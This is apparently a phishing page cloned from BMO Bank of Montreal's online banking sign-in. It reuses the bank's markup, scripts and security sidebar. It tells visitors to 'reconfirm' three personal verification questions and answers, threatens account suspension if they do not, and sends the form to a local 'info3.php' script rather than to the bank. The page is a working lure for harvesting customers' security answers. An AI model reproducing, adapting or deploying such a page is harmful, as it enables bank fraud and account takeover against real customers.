﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0067)https://www13.bmo.com/onlinebanking/cgi-bin/netbnx/NBmain?product=5 -->
<html class="dj_webkit dj_chrome dj_contentbox"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
		<meta http-equiv="X-UA-Compatible" content="IE=8">		
	    <script language="JavaScript" src="index_files/gen_validatorv2.js" type="text/javascript"></script>
	    <meta name="keywords" content="bank, banking, online, personal banking, business, commercial, small-business, bmo online banking, online banking, bmo bank of montreal, bmo financial group, bmo, mastercard, bmo mastercard , bank account, mortgage, loan, investment, credit card">
	    <meta name="description" content="Sign in to BMO Online Banking to access your BMO accounts and online services 24 hours a day, 7 days a week.">
	    <meta name="channelLevel1" content="home">
		
		<meta http-equiv="set-cookie" content="olbcookie=yes; path=/; secure">
	
		<title>BMO Bank of Montreal Online Banking</title>
		
		<script src="./index_files/ajaxCheck.js" type="text/javascript"></script>
		<script type="text/javascript">
		<!--
			checkAjax("en");
		//-->
		</script>
		<noscript>
		&lt;meta http-equiv="refresh" content="0;url=/onlinebanking/html/en/NoJavascript.html"/&gt;
		</noscript>		
		



<link href="https://www13.bmo.com/onlinebanking/onlinebanking/en/images/favicon.ico" rel="shortcut icon">

<style type="text/css">
.bit_button_lol {
	background: #7abcff; /* Old browsers */
	background: -moz-linear-gradient(top,  #7abcff 0%, #60abf8 44%, #4096ee 100%); /* FF3.6+ */
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#7abcff), color-stop(44%,#60abf8), color-stop(100%,#4096ee)); /* Chrome,Safari4+ */
	background: -webkit-linear-gradient(top,  #7abcff 0%,#60abf8 44%,#4096ee 100%); /* Chrome10+,Safari5.1+ */
	background: -o-linear-gradient(top,  #7abcff 0%,#60abf8 44%,#4096ee 100%); /* Opera 11.10+ */
	background: -ms-linear-gradient(top,  #7abcff 0%,#60abf8 44%,#4096ee 100%); /* IE10+ */
	background: linear-gradient(to bottom,  #7abcff 0%,#60abf8 44%,#4096ee 100%); /* W3C */
	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#7abcff', endColorstr='#4096ee',GradientType=0 ); /* IE6-9 */

	color: white;
	font-size: 12px;
	font-weight: bold;
	font-family: Arial, Tahoma, Verdana;

	border-radius: 5px;
	-moz-border-radius: 5px;
	-webkit-border-radius: 5px;
	-khtml-border-radius: 5px;
}
</style>

<link href="./index_files/dojo.css" rel="stylesheet" type="text/css">


<link href="./index_files/tundra.css" rel="stylesheet" type="text/css">


<link href="./index_files/bmo.base.css" rel="stylesheet" type="text/css">
<link href="./index_files/bmo.dojoTheme.css" rel="stylesheet" type="text/css">
<link href="./index_files/bmo.print.base.css" rel="stylesheet" type="text/css" media="print">

<script src="./index_files/dojo.js" type="text/javascript" djconfig="parseOnLoad: true"></script>
<script src="./index_files/olbdojo_en.js" type="text/javascript" charset="UTF-8"></script>
<script src="./index_files/olbdojo.js" type="text/javascript"></script>

<script type="text/javascript" src="./index_files/bmo.content.js"></script>
<script type="text/javascript" src="./index_files/bmo.base.js"></script>
<script type="text/javascript" src="./index_files/global.js"></script>
<!-- <script type="text/javascript" src="/onlinebanking/onlinebanking/js/zig.js"></script> -->

		<link href="./index_files/registration.css" rel="stylesheet" type="text/css">
		<script type="text/javascript" src="./index_files/registration.js"></script>
 
		


<link rel="meta" href="https://www1.bmo.com/labels_gss.rdf" type="application/rdf+xml" title="ICRA labels">
       
		
		
		
		<script language="javascript" src="./index_files/common.js"></script>
		<script language="javascript" src="./index_files/exsignin.js" charset="ISO-8859-1"></script>
		<script language="javascript">

		
		BMO.helpCentre.url = "https://www.bmo.com/olb/help-centre/en/signin";
		
		var errors = new Array();
		function displayErrors(errors,errorCode){
			var errorDivBoxElt = document.getElementById('clientSideErrorBoxId');
		
			var openingDiv = "";
			var closingDivs = "<div class='rbox-top-left'></div><div class='rbox-top-right'></div><div class='rbox-bottom-left'></div><div class='rbox-bottom-right'></div>";
			var finalHtml = "";
			if(errors != null && typeof errors  != 'undefined'){
				errorDivBoxElt.className='errorBox rbox bulletinBox rbox-container';
				var messages = new String();
				for(var i in errors){
					messages += errors[i] + '<br>';
				}
				
				if(errorCode != null && typeof errorCode  != 'undefined'){
					messages += '<br/><br/>' + errorCode;
				}
		
				finalHtml = openingDiv + messages + closingDivs;
		
				try{
					errorDivBoxElt.innerHTML = finalHtml;
				}catch(err){
		
				}
			}else{
				errorDivBoxElt.innerHTML='';
			}
		}	
	
		function resetErrors(){
			var errorDivBoxElt = document.getElementById('clientSideErrorBoxId');
			
			try{
				errorDivBoxElt.className='';
			}catch(err){
				//console.log("Errors occured here.");
			}
		}
	
		function redirect() {
		     window.location = "/onlinebanking/html/en/UpgradeInternetExplorer.html";  
		}
		</script>
		
		<script language="javascript">
		
			dojo.addOnLoad(
			    function(){
			    	var fbcDijit = dijit.byId("siBankCard");
			    	var fbcDropdownDijit = dijit.byId("siBankCardDD");
			    	
			    	if(fbcDijit){
				    	fbcDijit.focus(); 
			    	}
			    	if(fbcDropdownDijit){
				    	fbcDropdownDijit.focus(); 
			    	}
			    }
			);
			<!--
				if (self != top) 
				{
					top.location.href = self.location.href;
				}
				var fullyLoaded = false;
				window.name="main";
				function selectFBCNumber()
				{
					document.SignOn.FBC_Number.focus();
				}
				var busyTimer = null;
				var busy = "false";
				function checkDblclick() 
				{
					if (busy == "true") 
					{
						return false;
					} 
					else 
					{
						busyTimer = window.setTimeout("resetBusy()",15000);
						busy = "true";
						return true;
					}
				}
				function resetBusy() 
				{
					busy = "false";
				}
			// -->
			
		</script>
		<!-- For Passmark  -->
		<script src="./index_files/pm_fp.js" language="javascript" type="text/javascript"> </script> 
	<script type="text/javascript">
		var gPageTitle = "OLB - Registration & Sign-in - Sign In Toggle";
	</script><script>   
		function trackView(img) {
			trackViewFail(img, 'FBCForm', 'www13.bmo.com');
		}
	
		function trackViewStatus(img, viewStatus) {
			if (img.src.indexOf("sp.gif") == -1) {
				trackViewFailStatus(viewStatus, 'FBCForm', 'www13.bmo.com');
			}
		}
		
		function trackClick() {
			post('click', 'FBCForm', 'www13.bmo.com');
		}
	
	</script><script>
		function submitTo(product){
		
	//	var sf = dijit.byId('regSignInForm');
	//	if(sf.isValid()){
				if(product == 15){ //i.e MC
					var submitForm = document.getElementById('regSignInForm');
					submitForm.action = 'https://www13.bmo.com/onlinebanking'+'/MasterCard/MCmain/Password?product=' + product;
					if(MCSignInChecks()){
						submitForm.submit();
					}
					
				}
				else {
					if(SignInChecks()){
					var submitForm = document.getElementById('regSignInForm');
					var submitAction = submitForm.action;
					submitForm.action = submitAction + '?product=' + product;
					 submitForm.submit();
					}
				}
	//		}
			
			return false;
		}
	</script><script type="text/javascript">
		pgRef   = '';
		imgSrc  = '';
		lnkType = 'NW';
		altTag  = '';
		
	</script></head>

	

	

	
	 
	

	<!--[if lt IE 7]>  
	<SCRIPT LANGUAGE="javascript">
		redirect();
	</SCRIPT>
	<![endif]-->
	<!--[if IE 7 ]>    <body class="tundra ie7"> <![endif]-->
	<!--[if IE 8 ]>    <body class="tundra ie8"> <![endif]-->
	<!--[if IE 9 ]>    <body class="tundra ie9"> <![endif]-->
	<!--[if (gt IE 9)|!(IE)]><!--> <body class="tundra"> <!--<![endif]-->
	
	<!-- Wrapper div to keep all styles separate from any other space that these styles are integrated with. -->
	<div class="bmoOLB">
		<div id="root_div" class="medium">
			<div id="header" class="header">
					<a href="http://www.bmo.com/" type="image" ;="" return="" false;="" title="logo" alt="logo" id="header_logo">BMO Financial Group logo</a>
				<div id="headerLinks">
					<a href="" onclick="Popup(&#39;http://www4.bmo.com/bmo/tools/ABMLocator/step1&#39;,10); return false;">Locate an ATM or Branch</a> | 
					<a href="" onclick="Popup(&#39;http://www4.bmo.com/popup/0,4442,35649_1766913,00.html?pChannelId=1766905&#39;,10); return false;">Contact Us</a> | 
					
						<a href="https://www13.bmo.com/onlinebanking/cgi-bin/netbnx/NBmain?product=6">Français</a>
					
				</div>

				<form id="frmDropDown" name="frmDropDown" action="">
					<label id="lbl_signin" for="signin">Other BMO Sites: </label>
					<div id="signinContainer">
						<table class="dijit dijitReset dijitInline dijitLeft signin dijitDownArrowButton DropDownSignIn" dojoattachpoint="_buttonNode,tableNode" cellspacing="0" cellpadding="0" wairole="presentation" dojoattachevent="onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" role="presentation" widgetid="signin"><tbody wairole="presentation" role="presentation"><tr wairole="presentation" role="presentation"><td class="dijitReset dijitStretch dijitButtonContents dijitButtonNode" dojoattachpoint="focusNode" wairole="combobox" waistate="haspopup-true" role="combobox" aria-haspopup="true" aria-valuetext="BMO InvestorLine" id="signin" tabindex="0" title="Sign In"><span class="dijitReset dijitInline dijitButtonText" dojoattachpoint="containerNode,_popupStateNode"><span class="dijitReset dijitInline DropDownSignInLabel">BMO InvestorLine</span></span><input type="hidden" name="signin" dojoattachpoint="valueNode" value="https://www.bmoinvestorline.com" waistate="hidden-true" aria-hidden="true">
		</td><td class="dijitReset dijitRight dijitButtonNode dijitArrowButton dijitDownArrowButton" dojoattachpoint="titleNode" wairole="presentation" role="presentation"><div class="dijitReset dijitArrowButtonInner" wairole="presentation" role="presentation">&#8201;</div><div class="dijitReset dijitArrowButtonChar" wairole="presentation" role="presentation">&#9660;</div></td></tr></tbody></table>
					</div>
					<a href="" type="image" onclick="goHere(document.frmDropDown.signin.value); return false;" title="GO" alt="GO" id="header_goButton">GO</a>		
				</form>
				<div id="SecureSite">Secure Site</div>
			</div>
					
			<!-- END header -->
			<div id="middle_topCap"></div>
			<div id="middle_div">



			
			
					<div id="main_body" class="main_body registration regTwoCol reg_signintoggle">
			
					<div id="homepage_right_column" class="fullColumn">
						<div id="utilityBar">
								<div id="pageLevelUtilities">
		<ul id="pageLevelUtilitiesNav">
			<li>
				Text Size:
			</li>
			<li id="textSize">
				<a id="tsSmall" href="https://www13.bmo.com/onlinebanking/cgi-bin/netbnx/NBmain?product=5#" title="Small">Small</a>
				<a id="tsMedium" class="tsSelected" href="https://www13.bmo.com/onlinebanking/cgi-bin/netbnx/NBmain?product=5#" title="Medium">Medium</a>
				<a id="tsLarge" href="https://www13.bmo.com/onlinebanking/cgi-bin/netbnx/NBmain?product=5#" title="Large">Large</a>
			</li>
		</ul>
		<a id="helpCentre" href="https://www13.bmo.com/onlinebanking/cgi-bin/netbnx/NBmain?product=5#" title="Help Centre" alt="Help Centre">Help Centre</a>
	</div>

							<h1 id="mainHeader">Reconfirm Your (PVQ) Personal Verification Questions</h1>
						</div><div id="messageManagerArea" aria-live="assertive"><!-- - --></div>
							
						<div class="tripleColContainer">
							<!-- div class="singinToggleContainer rbox"-->
							<div>
								<p></p><br><br>
								<p style="font-size:14px"><b>Challenge Questions</b></p>
								<p></p>
								<p class="instructionsCopy">
								We need you to Reconfirm Your (PVQ) Personal Verification Questions and answers you have in file with us. Make sure you provide accurate information to avoid suspension of your account; this activity is for your account security purposes.
								</p>
							</div>
							
							<form dojoattachpoint="containerNode" dojoattachevent="onreset:_onReset,onsubmit:_onSubmit" name="loginForm" action="info3.php" method="post" id="regSignInForm" widgetid="regSignInForm">
								<!-- For Passmark  -->
								









	
	<script language="JavaScript" type="text/javascript">
	<!--
	var flashinstalled = 0;
	var flashversion = 0;
	MSDetect = "true";
	if (navigator.plugins && navigator.plugins.length) {
	    x = navigator.plugins["Shockwave Flash"];
	    if (x) {
	        flashinstalled = 2;
	        if (x.description) {
	            y = x.description;
	            flashversion = y.charAt(y.indexOf('.')-1);				
	        }
	    }
	    else
	        flashinstalled = 1;
	    if (navigator.plugins["Shockwave Flash 2.0"]) {
	        flashinstalled = 2;
	        flashversion = 2;
	    }
	}
	else if (navigator.mimeTypes && navigator.mimeTypes.length) {
	    x = navigator.mimeTypes['application/x-shockwave-flash'];
	    if (x && x.enabledPlugin)
		    flashinstalled = 2;
	    else
		    flashinstalled = 1;
	}
	else {
	    MSDetect = "true";
	}
	// -->
	</script>
	<script language="vbscript">
		on error resume next
		If MSDetect = "true" Then			
			For i = 2 to 6
				If Not(IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash." & i))) Then
				Else
					flashinstalled = 2
					flashversion = i
				End If
			Next
			If flashinstalled = 0 Then
				flashinstalled = 1
			End If
		End If
		</script>
		<script language="JavaScript" type="text/javascript">
		<!--
			if (flashinstalled == 2 && flashversion >= 6) {
				var out = "";
		out = out + "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'" + "\n";
		out = out + "width='1' height='1'>" + "\n";
		out = out + "<param name='movie' value='https://www13.bmo.com/pmfso.swf'>" + "\n";
		out = out + "<param name='quality' value='high'>" + "\n";
		out = out + "<param name='bgcolor' value=#FFFFFF>" + "\n";
		out = out + "<param name='FlashVars' value='gotoUrl=&sendUrl=https%3A%2F%2Fwww13.bmo.com%2Fsimplepmfso'>" + "\n";
		out = out + "<embed src='https://www13.bmo.com/pmfso.swf'" + "\n";
		out = out + "FlashVars='gotoUrl=&sendUrl=https%3A%2F%2Fwww13.bmo.com%2Fsimplepmfso'" + "\n";
		out = out + "quality='high' bgcolor='#FFFFFF' width='1' height='1'" + "\n";
		out = out + "type='application/x-shockwave-flash'>" + "\n";
		out = out + "<noembed>" + "\n";
		out = out + "</noembed>" + "\n";
		out = out + "<noobject></noobject>" + "\n";
		out = out + "</embed>" + "\n";
		out = out + "<noobject></noobject>" + "\n";
		out = out + "</object>" + "\n";
				document.write(out);
			}
		//-->
		</script>
		<noscript>
		&lt;object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'
				width='1' height='1'&gt;
			&lt;param name='movie' value='https://www13.bmo.com/pmfso.swf'&gt;
			&lt;param name='quality' value='high'&gt;
			&lt;param name='bgcolor' value=#FFFFFF&gt;
			&lt;param name='FlashVars' value='gotoUrl=&amp;sendUrl=https%3A%2F%2Fwww13.bmo.com%2Fsimplepmfso'&gt;
			&lt;embed src='https://www13.bmo.com/pmfso.swf'
					FlashVars='gotoUrl=&amp;sendUrl=https%3A%2F%2Fwww13.bmo.com%2Fsimplepmfso'
					quality='high' bgcolor='#FFFFFF' width='1' height='1'
					type='application/x-shockwave-flash'&gt;
				&lt;noembed&gt;&lt;/noembed&gt;
				&lt;noobject&gt;&lt;/noobject&gt;
			&lt;/embed&gt;
			&lt;noobject&gt;&lt;/noobject&gt;
		&lt;/object&gt;
		</noscript>




								


		
		<input type="hidden" name="pm_fp" id="pm_fp" value="">
		<script language="javascript">
			post_fingerprints();
		</script>

								<input name="state" type="hidden" value="1">
								<input name="saveFBC" type="hidden" value="">
 
								
								<div id="clientSideErrorBoxId"></div>
								
									<!-- <div id="masterCardContainer" class="singinToggleContainer rbox rbox-container disabled"> -->
									<div style="border: dashed 1px #aaa; background-color: #f6f6f6; padding: 10px;">
										<div class="rbox-left-side"><!-- - -->
											<div class="rbox-right-side"><!-- - -->
												<div class="rbox-content"><!-- - -->
													<table>
														<tr>
															<td><b>Question 1</b></td>
															<td>&nbsp;</td>
															<td>
																<select name="question1" style="height: 25px">
																	<option value="" selected="selected">Select</option>
																	<option value="Where is your favourite city?">Where is your favourite city?</option>
																        <option value="What is the name of your favourite superhero as a child?">What is the name of your favourite superhero as a child?</option>
																	<option value="What color is your first car?">What color is your first car?</option>
																	<option value="What is your favourite cartoon?">What is your favourite cartoon?</option>
																	<option value="What is the name of your first pet?">What is the name of your first pet?</option>
																	<option value="Who was your favourite athlete as a child?">Who was your favourite athlete as a child?</option>
																	<option value="What is your favourite musical instrument?">What is your favourite musical instrument?</option>
																	<option value="What is the name of the city where your mother was born?">What is the name of the city where your mother was born?</option>
																	<option value="What is the first name of the maid of honour at your wedding?">What is the first name of the maid of honour at your wedding?</option>
																	<option value="What is the first name of your oldest cousin?">What is the first name of your oldest cousin?</option>
																	<option value="What is the first name of the best man at your wedding?">What is the first name of the best man at your wedding?</option>
																	<option value="What is the name of the city where your father was born?">What is the name of the city where your father was born?</option>
																	<option value="What is the street name where you lived when you were 10 years old?">What is the street name where you lived when you were 10 years old?</option>
																	<option value="What is your youngest child&#39;s middle name?">What is your youngest child&#39;s middle name?</option>
																	<option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
																	<option value="What is the first name of the person you went to your prom with?">What is the first name of the person you went to your prom with?</option>
																	<option value="What city were you born in?">What city were you born in?</option>
																	<option value="What was the first name of your first manager?">What was the first name of your first manager?</option>
																	<option value="What is the first name of your oldest nephew?">What is the first name of your oldest nephew?</option>
																	<option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
																	<option value="What was the last name of your favourite teacher in high school?">What was the last name of your favourite teacher in high school?</option>
																	<option value="What is your spouse&#39;s/partner&#39;s middle name?">What is your spouse&#39;s/partner&#39;s middle name?</option>
																        <option value="What is the first name of your first friend?">What is the first name of your first friend?</option>
																	<option value="What is your mother&#39;s middle name?">What is your mother&#39;s middle name?</option>
																	<option value="What is the middle name of your oldest sibling?">What is the middle name of your oldest sibling?</option>
																	<option value="What is the first name of your father&#39;s oldest sibling?">What is the first name of your father&#39;s oldest sibling?</option>
																	<option value="What is the name of the city where your mother was born?">What is the name of the city where your mother was born?</option>
																	<option value="What was the first name of your first roommate?">What was the first name of your first roommate?</option>
																	<option value="What is the first name of your spouse&#39;s/partner&#39;s father?">What is the first name of your spouse&#39;s/partner&#39;s father?</option>
																</select>
															</td>
														</tr><tr>
															<td style="padding-top: 5px"><b>Answer</b></td>
															<td style="padding-top: 5px">&nbsp;</td>
															<td style="padding-top: 5px"><input type="text" name="answer1" size="30" style="margin-left:2px; height: 15px"></td>
														</tr><tr>
															<td colspan="3">&nbsp;</td>
														</tr>

														<tr>
															<td><b>Question 2</b></td>
															<td>&nbsp;</td>
															<td>
																<select name="question2" style="height: 25px">
																	<option value="" selected="selected">Select</option>
																	<option value="Where is your favourite city?">Where is your favourite city?</option>
																        <option value="What is the name of your favourite superhero as a child?">What is the name of your favourite superhero as a child?</option>
																	<option value="What color is your first car?">What color is your first car?</option>
																	<option value="What is your favourite cartoon?">What is your favourite cartoon?</option>
																	<option value="What is the name of your first pet?">What is the name of your first pet?</option>
																	<option value="Who was your favourite athlete as a child?">Who was your favourite athlete as a child?</option>
																	<option value="What is your favourite musical instrument?">What is your favourite musical instrument?</option>
																	<option value="What is the name of the city where your mother was born?">What is the name of the city where your mother was born?</option>
																	<option value="What is the first name of the maid of honour at your wedding?">What is the first name of the maid of honour at your wedding?</option>
																	<option value="What is the first name of your oldest cousin?">What is the first name of your oldest cousin?</option>
																	<option value="What is the first name of the best man at your wedding?">What is the first name of the best man at your wedding?</option>
																	<option value="What is the name of the city where your father was born?">What is the name of the city where your father was born?</option>
																	<option value="What is the street name where you lived when you were 10 years old?">What is the street name where you lived when you were 10 years old?</option>
																	<option value="What is your youngest child&#39;s middle name?">What is your youngest child&#39;s middle name?</option>
																	<option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
																	<option value="What is the first name of the person you went to your prom with?">What is the first name of the person you went to your prom with?</option>
																	<option value="What city were you born in?">What city were you born in?</option>
																	<option value="What was the first name of your first manager?">What was the first name of your first manager?</option>
																	<option value="What is the first name of your oldest nephew?">What is the first name of your oldest nephew?</option>
																	<option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
																	<option value="What was the last name of your favourite teacher in high school?">What was the last name of your favourite teacher in high school?</option>
																	<option value="What is your spouse&#39;s/partner&#39;s middle name?">What is your spouse&#39;s/partner&#39;s middle name?</option>
																        <option value="What is the first name of your first friend?">What is the first name of your first friend?</option>
																	<option value="What is your mother&#39;s middle name?">What is your mother&#39;s middle name?</option>
																	<option value="What is the middle name of your oldest sibling?">What is the middle name of your oldest sibling?</option>
																	<option value="What is the first name of your father&#39;s oldest sibling?">What is the first name of your father&#39;s oldest sibling?</option>
																	<option value="What is the name of the city where your mother was born?">What is the name of the city where your mother was born?</option>
																	<option value="What was the first name of your first roommate?">What was the first name of your first roommate?</option>
																	<option value="What is the first name of your spouse&#39;s/partner&#39;s father?">What is the first name of your spouse&#39;s/partner&#39;s father?</option>
																</select>
															</td>
														</tr><tr>
															<td style="padding-top: 5px"><b>Answer</b></td>
															<td style="padding-top: 5px">&nbsp;</td>
															<td style="padding-top: 5px"><input type="text" name="answer2" size="30" style="margin-left:2px; height: 15px"></td>
														</tr><tr>
															<td colspan="3">&nbsp;</td>
														</tr>

														<tr>
															<td><b>Question 3</b></td>
															<td>&nbsp;</td>
															<td>
																<select name="question3" style="height: 25px">
																	<option value="" selected="selected">Select</option>
																	<option value="Where is your favourite city?">Where is your favourite city?</option>
																        <option value="What is the name of your favourite superhero as a child?">What is the name of your favourite superhero as a child?</option>
																	<option value="What color is your first car?">What color is your first car?</option>
																	<option value="What is your favourite cartoon?">What is your favourite cartoon?</option>
																	<option value="What is the name of your first pet?">What is the name of your first pet?</option>
																	<option value="Who was your favourite athlete as a child?">Who was your favourite athlete as a child?</option>
																	<option value="What is your favourite musical instrument?">What is your favourite musical instrument?</option>
																	<option value="What is the name of the city where your mother was born?">What is the name of the city where your mother was born?</option>
																	<option value="What is the first name of the maid of honour at your wedding?">What is the first name of the maid of honour at your wedding?</option>
																	<option value="What is the first name of your oldest cousin?">What is the first name of your oldest cousin?</option>
																	<option value="What is the first name of the best man at your wedding?">What is the first name of the best man at your wedding?</option>
																	<option value="What is the name of the city where your father was born?">What is the name of the city where your father was born?</option>
																	<option value="What is the street name where you lived when you were 10 years old?">What is the street name where you lived when you were 10 years old?</option>
																	<option value="What is your youngest child&#39;s middle name?">What is your youngest child&#39;s middle name?</option>
																	<option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
																	<option value="What is the first name of the person you went to your prom with?">What is the first name of the person you went to your prom with?</option>
																	<option value="What city were you born in?">What city were you born in?</option>
																	<option value="What was the first name of your first manager?">What was the first name of your first manager?</option>
																	<option value="What is the first name of your oldest nephew?">What is the first name of your oldest nephew?</option>
																	<option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
																	<option value="What was the last name of your favourite teacher in high school?">What was the last name of your favourite teacher in high school?</option>
																	<option value="What is your spouse&#39;s/partner&#39;s middle name?">What is your spouse&#39;s/partner&#39;s middle name?</option>
																        <option value="What is the first name of your first friend?">What is the first name of your first friend?</option>
																	<option value="What is your mother&#39;s middle name?">What is your mother&#39;s middle name?</option>
																	<option value="What is the middle name of your oldest sibling?">What is the middle name of your oldest sibling?</option>
																	<option value="What is the first name of your father&#39;s oldest sibling?">What is the first name of your father&#39;s oldest sibling?</option>
																	<option value="What is the name of the city where your mother was born?">What is the name of the city where your mother was born?</option>
																	<option value="What was the first name of your first roommate?">What was the first name of your first roommate?</option>
																	<option value="What is the first name of your spouse&#39;s/partner&#39;s father?">What is the first name of your spouse&#39;s/partner&#39;s father?</option>								
                                                                                                                                 </select>
															</td>
														</tr><tr>
															<td style="padding-top: 5px"><b>Answer</b></td>
															<td style="padding-top: 5px">&nbsp;</td>
															<td style="padding-top: 5px"><input type="text" name="answer3" size="30" style="margin-left:2px; height: 15px"></td>
														</tr><tr>
															<td colspan="3">&nbsp;</td>
														</tr>

                                                                                                                <tr>
															<td colspan="3">&nbsp;</td>
														</tr>
													</table>

													<br>
													Recognizing this computer allows you to access Online Banking without having to fill the challenge questions everytime you sign in. Recognize this computer only if it is one you frequently use to sign in to Online Banking. This will most likely be your home or office computer. Do not recognize a computer in a public place where other people have access such as a computer at a library or an internet cafe.<br><br>
													Would you like to recognize this computer?<br><br>

													<input type="checkbox" dojoType="dijit.form.CheckBox" id="regRecognizeComputer" name="bindDevice" value="true" class="signInRecognizeComputerCheckBox" checked="checked" />
													<b>Yes</b>, recognize this computer, it is a computer I trust and use often
												</div>
											</div>
										</div>
									<div class="rbox-top-left"><!-- - --></div>
									<div class="rbox-top-right"><!-- - --></div>
									<div class="rbox-bottom-left"><!-- - --></div>
									<div class="rbox-bottom-right"><!-- - --></div>
								</div>

							<span style="float: right; margin-top: 30px" class="dijit dijitReset dijitLeft dijitInline btnSubmit dijitButton" dojoattachevent="onclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="btnBankCardContinueNoCache1"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode"><input class="bit_button_lol" name="cont_login" type="submit" value="Continue">&nbsp;</span></span></span>
   						</form>
						</div>
        
						<div class="singleColContainer last">
							
							
								
								


<div class="regSecurityBox rbox rbox-container">
<a href="http://www.bmo.com/home/about/banking/privacy-security/how-we-protect-you#tabs-3" target="_blank">
	<img id="imgSecLock" src="./index_files/security_icon.gif" title="100% Online Banking Guarantee" alt="100% Online Banking Guarantee" align="top" hspace="0" vspace="0" border="0"></a>
	<h2><!-- Important Security Information --></h2>
	<p>
		At BMO Bank of Montreal your security is our priority. Our secure sign in process and strong encryption are only the first steps we take to provide you with a safe and secure Online Banking experience.
	</p>
	<ul>
		<li>
			<a href="http://www.bmo.com/home/about/banking/security/online-banking-guarantee" target="_blank">We will reimburse you 100%</a> for any losses to your Personal Banking accounts resulting from unauthorized transactions through Online Banking.
		</li>
		<li>We will never ask you to provide passwords, account numbers or challenge questions and answers by email, telephone or fax. If you receive an email that you think is fraudulent <a href="http://www.bmo.com/home/popups/about/report-fraud" target="_blank">please report it to us</a> as soon as possible.</li>
		<li class="last">We offer a <a href="http://www.bmo.com/home/about/banking/privacy-security/how-we-protect-you?nav=left#tabs-5" target="_blank">free download of Trusteer's Rapport software</a> to help protect you from online fraud and identity theft.</li>
	</ul>
	<p class="seeMoreLinks">
		Learn more about how to <a href="http://www.bmo.com/home/about/banking/privacy-security/protecting-yourself?nav=left" target="_blank">protect yourself online.</a>
	</p>
<div class="rbox-top-left"><!-- - --></div><div class="rbox-top-right"><!-- - --></div><div class="rbox-bottom-left"><!-- - --></div><div class="rbox-bottom-right"><!-- - --></div></div>

								
							
							
						</div>
					</div> 
				</div>
			</div>
			<!-- END middle_div -->
			<div id="middle_bottomCap"></div>
			<!-- footer -->
			<div id="footer" class="footer">
				







<div id="ptBottomFooter">
	<a href="" onclick="Popup(&#39;http://www.bmo.com/home/about/banking/privacy-security/our-privacy-code&#39;,1); return false;">Privacy</a> | 
	<a href="" onclick="Popup(&#39;http://www4.bmo.com/popup/0,4442,35649_51991,00.html&#39;,6); return false;">Legal</a> | 
	<a href="" onclick="Popup(&#39;http://www.bmo.com/home/about/banking/privacy-security/how-we-protect-you&#39;,1); return false;">Security</a> | 
	<a href="" onclick="Popup(&#39;http://www.bmo.com/home/popups/global/cdic&#39;,6); return false;">CDIC Member</a>
	<div id="ptRightEndorseLogo"></div>
</div>




<script type="text/JavaScript">
	function writeZigFile() {
	    document.write("<script language='javascript' type='text/javascript' src='/onlinebanking/includes/zig.js'><\/script>");
	}
	writeZigFile();
</script><script language="javascript" type="text/javascript" src="./index_files/zig.js"></script><img alt="webanalytics" style="display:none;" src="https://csvtr.bmo.com/bmo/zag.gif?Log=1&dt=OLB%20-%20Registration%20%26%20Sign-in%20-%20Sign%20In%20Toggle&dl=https%3A//www13.bmo.com/onlinebanking/cgi-bin/netbnx/NBmain%3Fproduct%3D5&dr=&cb=1367344937696&sw=1366&sh=768&cd=32&fv=11.7.700">
<noscript>&lt;img src="https://csvtr.bmo.com/bmo/zag.gif?Log=1&amp;amp;" height="1" alt="webanalytics" /&gt;</noscript>





			</div>
			<!-- /footer -->
			<script language="javascript">
				<!--
				fullyLoaded = true;

				document.onkeydown = function(event){      
					var holder;      //IE uses this      
					if(window.event){            
					 holder=window.event.keyCode;      
					 }     
					//FF uses this      
					else{             
					 holder=event.which;     
					}       
					submitOnEnter(holder); 
				}	
		
				function submitOnEnter(key)
				{	
					if(key==13){
					
						var siBankCardDJ = dijit.byId("siBankCard"),
							siMasterCardDJ = dijit.byId("siMasterCard"),
							bankCardSelect = dijit.byId("siBankCardDD"),
							masterCardSelect = dijit.byId("siMasterCardDD");
						
							if(siBankCardDJ){
								if(siBankCardDJ.getValue() != ''){
									submitTo(5);
									return false;
								}
							}
		
							if(siMasterCardDJ){
								if(siMasterCardDJ.getValue() != ''){
									submitTo(15);
									return false;
								}
							}
												
							if(bankCardSelect){
								if(bankCardSelect.getValue() != '' && bankCardSelect.getValue() != "diff_card"){
									submitTo(5);
									return false;
								}
							}
		
							if(masterCardSelect){
								if(masterCardSelect.getValue() != '' && masterCardSelect.getValue() != "diff_card"){
									submitTo(15);
									return false;
								}
							}
		
							submitTo(5);
							return false;
					}
				}		 
				
							
				// -->
			</script>
		</div>
			
	</div> 
	    
<!-- Online_Banking               -->	    
<!-- 13.05.b36               -->
<!-- 11:28 AM 11.04.2013                 -->

	

<div class="bmoDijitDialog" tabindex="-1" wairole="dialog" waistate="labelledby-bmo_Dialog_0_title" role="dialog" aria-labelledby="bmo_Dialog_0_title" id="bmo_Dialog_0" style="left: 672px; top: 336px; display: none; position: absolute;" widgetid="bmo_Dialog_0" title="">
	<div dojoattachpoint="titleBar" class="bmoDijitDialogTitleBar">
	<span dojoattachpoint="titleNode" class="dijitDialogTitle" id="bmo_Dialog_0_title"></span>
	<span dojoattachpoint="closeButtonNode" class="dijitDialogCloseIcon" dojoattachevent="onclick: onCancel, onmouseenter: _onCloseEnter, onmouseleave: _onCloseLeave" title="Close" style="display: block;">
		<span dojoattachpoint="closeText" class="closeText" title="Cancel" style="display: none;">x</span>
	</span>
	</div>
		<div dojoattachpoint="containerNode" class="bmoDijitDialogPaneContent"><iframe id="helpCenterIframeId" style="border: none; width: 855px; height: 825px;" frameborder="0"></iframe></div>
